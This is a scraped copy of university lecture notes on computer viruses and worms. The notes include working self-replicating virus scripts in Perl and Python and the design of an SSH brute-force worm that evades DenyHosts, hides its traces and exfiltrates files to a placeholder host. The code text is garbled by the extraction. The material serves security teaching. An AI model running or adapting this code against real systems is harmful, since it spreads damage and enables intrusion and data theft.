Lecture notes on Computer and Network security

computer and network security tutorial. and what is the difference between computer and network security pdf free download
NancyWest Profile Pic
Published Date:12-07-2017
Your Website URL(Optional)
Lecture 22: Malware: Viruses and Worms Lecture Notes on “Computer and Network Security” by Avi Kak (kakpurdue.edu) April 11, 2017 10:55pm c 2017 Avinash Kak, Purdue University Goals: • Attributes of a virus Educational examples of a virus in Perl and Python • • Attributes of a worm • Educational examples of a worm in Perl and Python • Some well-known worms of the past • The Conficker and Stuxnet worms • How afraid should we be of viruses and worms?CONTENTS Section Title Page 22.1 Viruses 3 22.2 The Anatomy of a Virus with Working 6 Examples in Perl and Python 22.3 Worms 12 22.4 Working Examples of a Worm in 15 Perl and Python 22.5 Morris and Slammer Worms 32 22.6 The Conficker Worm 35 22.6.1 The Anatomy of Conficker.A and 44 Conficker.B 22.6.2 The Anatomy of Conficker.C 49 22.7 The Stuxnet Worm 52 22.8 How Afraid Should We Be of 56 Viruses and Worms 22.9 Homework Problems 62 2Computer and Network Security by Avi Kak Lecture 22 22.1: VIRUSES • A computer virus is a malicious piece of executable code that propagates typically by attaching itself to ahost document that willgenerally bean executable file. In the context of talking about viruses, the word “host” means a document or a file. As you’ll recall from our earlier discussions, in the context of computer networking protocols, a “host” is typically a digital device capable of communicating with other devices. Even more specifically, in the context of networking protocols, a host is whatever is identified by a network address, like the IP address. • Typical hosts for computer viruses are: – Executable files (such as the ‘.exe’ files in Windows machines) that may be sent around as email attachments – Boot sectors of disk partitions – Script files for system administration (such as the batch files in Windows machines, shell script files in Unix, etc.) 3Computer and Network Security by Avi Kak Lecture 22 – Documents that are allowed to contain macros (such as Mi- crosoftWorddocuments, Excel spreadsheets, Accessdatabase files, etc.) • Any operating system that allows third-party programs to run can support viruses. • Because of the way permissions work in Unix/Linux systems, it is more difficult for a virus to wreak havoc in such machines. Let’ssay that a virus embedded itselfinto one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have the permission to read or modify a certain system file, the virus code will, in general, be constrained by the same restriction. Windows machines also have a multi-level organization of permissions. For example, you can be an administrator with all possible privileges or you can be just a user with more limited privileges. But it is fairly common for the owners of Windows machines to leave them running in the “administrator” mode. That is, most owners of Windows machines will have only one account on their machines and that will be the account with administrator privileges. For various reasons that we do not want to go into here, this does not happen in Unix/Linux machines. • At the least, a virus will duplicate itself when it attaches itself to another host document, that is, to another executable file. But the important thing to note is that this copy does not have to be an exact replica of itself. In order to make more difficult its detection by pattern matching, a virus 4Computer and Network Security by Avi Kak Lecture 22 may alter itself when it propagates from host to host. In most cases, the changes made to the virus code are simple, such as rearrangementoftheorderindependentinstructions,etc. Viruses that are capable of changing themselves are called mutating viruses. • Computer viruses need to know if a potential host is already infected, since otherwise the size of an infected file could grow without bounds through repeated infection. Viruses typically place a signature (such as a string that is an impossible date) at a specific location in the file for this purpose. • Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finishedexecution. However, itispossibleforamoreviciousvirus to create a continuously running program in the background. • Toescapedetection,themoresophisticatedvirusesencryptthem- selves with keys that change with each infection. What stays constant in such viruses is the decryption routine. • The payload part of a virus is that portion of the code that is not related to propagation or concealment. 5Computer and Network Security by Avi Kak Lecture 22 22.2: THE ANATOMY OF A VIRUS WITH WORKING EXAMPLES IN PERL AND PYTHON • As should be clear by now, a virus is basically a self-replicating piece of code that needs a host document to glom on to. • As demonstrated by the simple Perl and Python scripts I will show in this section, writing such programs is easy. The only competence you need is regarding file I/O at a fairly basic level. • ThePerlandPythonvirusimplementationsshowninthissection use as host documents those files whose names end in the ‘.foo’ suffix. It inserts itself into all such files. • If you send an infected file to someone else and they happen to execute the file, it will infect their ‘.foo’ files also. • Note that the virus does not re-infect an already infected file. This behavior is exhibited by practically all viruses. This it does byskipping‘.foo’filesthatcontainthe‘foovirus’signaturestring. 6Computer and Network Security by Avi Kak Lecture 22 • It should not be too hard to see how the harmless virus shown here could be turned into a dangerous piece of code. • As for the name of the virus, since it affects only the files whose names end in the suffix ‘.foo’, it seems appropriate to name it “FooVirus” and to call the Perl script file “FooVirus.pl” and the Python script file “FooVirus.py”. • Intherestofthissection,I’llfirstpresentthePerlscriptFooVirus.pl and then the Python script FooVirus.py. /usr/bin/perl FooVirus.pl Author: Avi kak (kakpurdue.edu) Date: April 19, 2006 print "\nHELLO FROM FooVirus\n\n"; print "This is a demonstration of how easy it is to write\n"; print "a self-replicating program. This virus will infect\n"; print "all files with names ending in .foo in the directory in\n"; print "which you execute an infected file. If you send an\n"; print "infected file to someone else and they execute it, their,\n"; print ".foo files will be damaged also.\n\n"; print "Note that this is a safe virus (for educational purposes\n"; print "only) since it does not carry a harmful payload. All it\n"; print "does is to print out this message and comment out the\n"; print "code in .foo files.\n\n"; open IN, " 0"; my virus; for (my i=0;i37;i++) virus .= IN; foreach my file ( glob ".foo" ) open IN, " file"; my all_of_it = IN; 7Computer and Network Security by Avi Kak Lecture 22 close IN; next if (join ’ ’, all_of_it) = /foovirus/m; chmod 0777, file; open OUT, " file"; print OUT "virus"; map s/_/_/, all_of_it; print OUT all_of_it; close OUT; • Regarding the logic of the code in the virus, the following section of the code open IN, " 0"; my virus; for (my i=0;i37;i++) virus .= IN; reads the first 37 lines of the file that is being executed. This could be the original FooVirus.pl file or one of the files infected by it. Note that FooVirus.pl contains exactly 37 lines of text and code. And when the virus infects another ‘.foo’ file, it places itself at the head of the infected file and then comments out the rest of the target file. So the first 37 lines of any infected file will be exactly like what you see in FooVirus.pl.If you are not familiar with Perl, 0 is one of Perl’s predefined variables. It contains the name of the file being executed. The syntax ‘open IN, " 0"’ means that you want to open the file, whose name is stored in the variable 0, for reading. The extra symbol ‘’ just makes explicit that the file is being opened for reading. This symbol is not essential since, by default, a file is opened in the read mode anyway. • The information read by the for loop in the previous bullet is saved in the variable virus. 8Computer and Network Security by Avi Kak Lecture 22 • Let’s now look at the foreachloop in the virus. It opens each file forreadingwhosenamecarriesthesuffix‘.foo’. The ‘open IN, " file"’ statement opens the ‘.foo’ file in just the reading mode. The statement ‘my all_of_it = IN’ reads all of the file into the string variable all_of_it. • We next check if there is a string match between the file contents stored in all_of_it and the string ‘foovirus’. If there is, we do not do anything further with this file since we do not want to reinfect a file that was infected previously by our virus • Assuming that we are working with a ‘.foo’ file that was not previously infected, we now do ‘chmod 0777, file’ to make the ‘.foo’ file executable since it is the execution of the file that will spread the infection. • The next statement open OUT, " file"; opens the same ‘.foo’ file in the write-only mode. The first thing we write out to this file is the virus itself by using the command ‘print OUT "virus"’. • Next, we want to put back in the file what it contained originally butafterplacingthePerlcommentcharacter‘’atthebeginning of each line. This is to prevent the file from causing problems with its execution in case the file has other executable code in 9Computer and Network Security by Avi Kak Lecture 22 it. Inserting the ‘’ character at the beginning of each file is accomplished by map s/_/_/, all_of_it; and the write-out of this modified content back to the ‘.foo’ file is accomplished by ‘print OUT all_of_it’. Again, if you are not so familiar with Perl, is Perl’s default variable that, in the current context, would be bound to each line of the input file as map scans the contents of the array all of it and applies the first argument string substitution rule to it. • Shown next is the Python version of the virus code: /usr/bin/env python import sys import os import glob FooVirus.py Author: Avi kak (kakpurdue.edu) Date: April 5, 2016 print("\nHELLO FROM FooVirus\n") print("This is a demonstration of how easy it is to write") print("a self-replicating program. This virus will infect") print("all files with names ending in .foo in the directory in") print("which you execute an infected file. If you send an") print("infected file to someone else and they execute it, their,") print(".foo files will be damaged also.\n") print("Note that this is a safe virus (for educational purposes") print("only) since it does not carry a harmful payload. All it") print("does is to print out this message and comment out the") print("code in .foo files.\n") IN = open(sys.argv0, ’r’) virus = line for (i,line) in enumerate(IN) if i 37 for item in glob.glob(".foo"): IN = open(item, ’r’) all_of_it = IN.readlines() IN.close() if any(line.find(’foovirus’) for line in all_of_it): next os.chmod(item, 0777) 10Computer and Network Security by Avi Kak Lecture 22 OUT = open(item, ’w’) OUT.writelines(virus) all_of_it = ’’ + line for line in all_of_it OUT.writelines(all_of_it) OUT.close() • ThelogicofthePythonscriptshownaboveparallelsexactlywhat you saw in the Perl version of the virus code. • Toplaywiththisvirus,createaseparatedirectorywithanyname ofyourchoosing. Nowcopyeither FooVirus.pl or FooVirus.py into that directory and make sure you make the file executable. At the same time, create a couple of additional files with names like a.foo, b.foo, etc. and put any random keystrokes in those files. Also create another directory elsewhere in your computer and similarly create files with names like c.foo and d.foo in that directory. Now you areall set to demonstratethe beastlyways of the innocent looking FooVirus. Execute the Perl or the Python versionofthevirusfileinthefirstdirectoryandexaminethecon- tents of a.foo and b.foo. You shouldfindthem infectedby the virus. Then move the infected a.foo, or any of the other ‘.foo’ files, from the first directory to the second directory. Execute the file you just moved to the second directory and examine the contents of c.foo or d.foo. If you are not properly horrified by thedamagedonetothosefiles, thensomethingisseriouslywrong with you. In that case, stop worrying about your computer and seek immediate help for yourself 11Computer and Network Security by Avi Kak Lecture 22 22.3: WORMS • The main difference between a virus and a worm is that a worm does not need a host document. In other words, a worm does not need to attach itself to another program. In that sense, a worm is self-contained. • On its own, a worm is able to send copies of itself to other ma- chines over a network. • Therefore, whereas a worm can harm a network and consume networkbandwidth, thedamagecausedby a virusis mostlylocal to a machine. • But note that a lot of people use the terms ‘virus’ and ‘worm’ synonymously. That is particularly the case with the vendors of anti-virussoftware. Acommercialanti-virusprogramissupposed to catch both viruses and worms. • Since, by definition, a worm is supposed to hop from machine to machine on its own, it needs to come equipped with considerable networking support. 12Computer and Network Security by Avi Kak Lecture 22 • With regard to autonomous network hopping, the important question to raise is: What does it mean for a program to hop from machine to machine? • A program may hop from one machine to another by a variety of means that include: – By using the remote shell facilities, as provided by, say, ssh, rsh, rexec, etc., in Unix, to execute a command on the re- mote machine. If the target machine can be compromised in this manner, the intruder could install a small bootstrap pro- gram on the target machine that could bring in the rest of the malicious software. – By cracking the passwords and logging in as a regular user on a remote machine. Password crackers can take advantage of the people’s tendency to keep their passwords as simple as possible (under the prevailing policies concerning the length and complexity of the words). See the Dictionary Attack in Lecture 24. – By using buffer overflow vulnerabilities in networking soft- ware. See Lecture 21 on Buffer Overflow Attacks In networking with sockets, a client socket initiates a communication link with a serverbysendingarequesttoaserversocketthatisconstantly listening for such requests. If the server socket code is vulner- able to buffer overflow or other stack corruption possibilities, 13Computer and Network Security by Avi Kak Lecture 22 an attacker could manipulate that into the execution of cer- tain system functions on the server machine that would allow the attacker’s code to be downloaded into the server machine. • In all cases, the extent of harm that a worm can carry out would depend on the privileges accorded to the guise under which the worm programs are executing. So if a worm manages to guess someone’spasswordonaremotemachine(andthatsomeonedoes not have superuser privileges), the extent of harm done might be minimal. • Nevertheless, even when no local “harm” is done, a propagat- ing worm can bog down a network and, if the propagation is fast enough, can cause a shutdown of the machines on the net- work. This can happen particularly when the worm isnotsmart enough to keep a machine from getting reinfected repeatedly and simultaneously. Machines can only support a certain maximum number of processes running simultaneously. • Thus,even“harmless”wormscancausealotofharmbybringing a network down to its knees. 14Computer and Network Security by Avi Kak Lecture 22 22.4: WORKING EXAMPLES OF A WORM IN PERL AND PYTHON • The goal of this section is to present a safe working example of a worm, AbraWorm, that attempts to break into hosts that are randomlyselectedintheinternet. ThewormattemptsSSHlogins using randomly constructed but plausible looking usernames and passwords. • Since the DenyHosts tool (described in Lecture 24) can easily quarantine IP addresses that make repeated attempts at SSH lo- gin with different usernames and passwords, the worm presented inthissectionreversestheorderinwhichthetargetIPaddresses, the usernames, and the passwords are attempted. Instead of at- tempting to break into the same target IP address by quickly sequencing through a given list of usernames and passwords, the wormfirstconstructsalistofusernamesandpasswordsandthen, for each combination of a username and a password, attempts to breakinto thehostsina listofIPaddresses. Withthis approach, it is rather easy to set up a scan sequence so that the same IP address would be visited at intervals that are sufficiently long so as not to trigger the quarantine action by DenyHosts. 15Computer and Network Security by Avi Kak Lecture 22 • The worm works in an infinite loop, for ever trying new IP ad- dresses, new usernames, and new passwords. • The point of running the worm in an infinite loop is to illustrate the sort of network scanning logic that is often used by the bad guys. Let’s say that a bunch of bad guys want to install their spam-spewing software in as many hosts around the world as possible. Chances are that these guys are not too concerned about where exactly these hosts are, as long as they do the job. The bad guys would create a worm like the one shown in this section, a worm that randomly scans the different IP address blocks until it can find vulnerable hosts. • After the worm has successfully gained SSH access to a machine, itlooksforfilesthatcontainthestring“abracadabra”. Theworm first exfiltrates out those files to where it resides in the internet and, subsequently, uploads the filesto a speciallydesignated host in the internet whose address is shown as yyy.yyy.yyy.yyyin the code. A reader might ask: Wouldn’t using an actual IP address for yyy.yyy.yyy.yyy give a clue to the identity of the human handlers of the worm? Not really. In general, the IP address that the worm uses for yyy.yyy.yyy.yyy can be for any host in the internet that the worm successfully infiltrated into previously — provided it is able to convey the login information regarding that host to its human handlers. The worm could use a secret IRC channel to convey to its human handlers the username and the password that it used to break into the hosts selected for uploading the files exfiltrated from the victim machines. (See Lecture 29 for how IRC is put to use for such deeds.) You would obviously need more code in the worm for this feature to work. 16Computer and Network Security by Avi Kak Lecture 22 • Since the worm installs itself in each infected host, the bad guys will have an ever increasing army of infected hosts at their disposal because each infected host will also scan the inter- net for additional vulnerable hosts. • Intherestofthissection,I’llfirstexplainthelogininthePerlim- plementation of the worm. Subsequently, I’ll present the Python implementation of the same worm. • Forthe Perl versionof theworm, asshown inthefile AbraWorm.pl that follows, you’d need to install the Perl module Net::OpenSSH in your computer. On a Ubuntu machine, you can do this sim- ply by installing the package libnet-oepnsssh-perlthrough your Synaptic Package Manager. • To understand the Perl code file shown next, it’s best to start by focusing on the role played by each of the following global variables that are declared at the beginning of the script: digrams trigrams opt debug NHOSTS NUSERNAMES NPASSWDS • The array variables digrams and trigrams store, respec- 17Computer and Network Security by Avi Kak Lecture 22 tively, a collection of two-letter and three-letter “syllables” that can be joined together in random ways for constructing plausible looking usernames and passwords. Since a common requirement thesedaysisforpasswordstocontainacombinationoflettersand digits,whenwerandomlyjointogetherthesyllablesforconstruct- ing passwords, we throw in randomly selected digits between the syllables. This username and password synthesis is carried out by the functions get_new_usernames() get_new_passwds() that are defined toward the end of the worm code. • The global variable opt is for defining the negotiation parame- tersneededforsettinguptheSSHconnectionwitharemotehost. We obviously would not want the downloaded public key for the remote host to be stored locally (in order to not arouse the sus- picions of the human owner of the infected host). We therefore set the UserKNownHostsFile parameter to /dev/null, as you can see in the definition of opt. The same applies to the other parameters in the definition of this variable. • If you are interested in playing with the worm code, the global variable debug is important for you. You should execute the worm code in the debug mode by changing the value of debug from 0 to 1. But note that, in the debug mode, you need to sup- ply the worm with at least two IP addresses where you have SSH 18Computer and Network Security by Avi Kak Lecture 22 access. You need at least one IP address for a host that contains oneormoretextfileswiththestring“abracadabra”inthem. The IP addresses of such hosts go where you see xxx.xxx.xxx.xxx in the code below. In addition, you need to supply another IP address for a host that will serve as the exfiltration desti- nation for the “stolen” files. This IP address goes where you see yyy.yyy.yyy.yyy in the code. For both xxx.xxx.xxx.xxx and yyy.yyy.yyy.yyy, you would also need to supply the login credentials that work at those addresses. • That takes us to the final three global variables: NHOSTS NUSERNAMES NPASSWDS The value given to NHOSTS determines how many new IP ad- dresses will be produced randomly by the function get_fresh_ipaddresses() in each call to the function. The value given to USERNAMES determines how many new usernames will be synthesized by the function get new usernames() in each call. And, along the same lines, the value of NPASSWDS determines how many pass- words will be generated by the function get new passwds() in each call to the function. As you see near the beginning of the code, I have set the values for all three variables to 3 for demon- stration purposes. 19Computer and Network Security by Avi Kak Lecture 22 • As for the name of the worm, since it only steals the text files that contain the string “abracadabra”, it seems appropriate to call the worm “AbraWorm” and the script file “AbraWorm.pl”. • Youcandownloadthecodeshownbelowfromthewebsiteforthe lecture notes. /usr/bin/perl -w AbraWorm.pl Author: Avi kak (kakpurdue.edu) Date: March 30, 2014 This is a harmless worm meant for educational purposes only. It can only attack machines that run SSH servers and those too only under very special conditions that are described below. Its primary features are: It tries to break in with SSH login into a randomly selected set of hosts with a randomly selected set of usernames and with a randomly chosen set of passwords. If it can break into a host, it looks for the files that contain the string ‘abracadabra’. It downloads such files into the host where the worm resides. It uploads the files thus exfiltrated from an infected machine to a designated host in the internet. You’d need to supply the IP address and login credentials at the location marked yyy.yyy.yyy.yyy in the code for this feature to work. The exfiltrated files would be uploaded to the host at yyy.yyy.yyy.yyy. If you don’t supply this information, the worm will still work, but now the files exfiltrated from the infected machines will stay at the host where the worm resides. For an actual worm, the host selected for yyy.yyy.yyy.yyy would be a previosly infected host. 20

Advise: Why You Wasting Money in Costly SEO Tools, Use World's Best Free SEO Tool Ubersuggest.